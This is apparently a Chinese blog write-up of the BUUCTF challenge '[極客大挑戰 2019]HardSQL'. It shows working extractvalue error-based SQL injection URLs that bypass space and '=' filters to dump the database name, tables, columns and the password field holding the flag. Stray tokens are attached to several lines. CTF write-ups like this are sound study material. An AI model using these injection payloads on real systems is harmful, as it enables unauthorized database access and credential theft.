博客說明php
文章所涉及的資料來自互聯網整理和我的總結,意在於我的學習和經驗彙總,若有什麼地方侵權,請聯繫本人刪除,謝謝!本文僅用於學習與交流,不得用於非法用途!
網址數據庫
Web類,[極客大挑戰 2019]HardSQLspa
打開題目的實例3d
SQl的題目,首先試一試萬能密碼code
試一下雙寫orm
看來被封死了,想一想其餘的辦法,能夠使用extractvalue和updatexml進行報錯注入,空格和=號沒有,因此咱們要使用()來代替空格,使用like來代替=號xml
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23
這一下報錯把數據庫名給爆出來了blog
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23
把password查出來rem
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23
flag出來了,不對好像只有一半,使用{left(),right()}
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23 /check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23
拼接起來就是flag了
感謝
BUUCTF以及勤勞的本身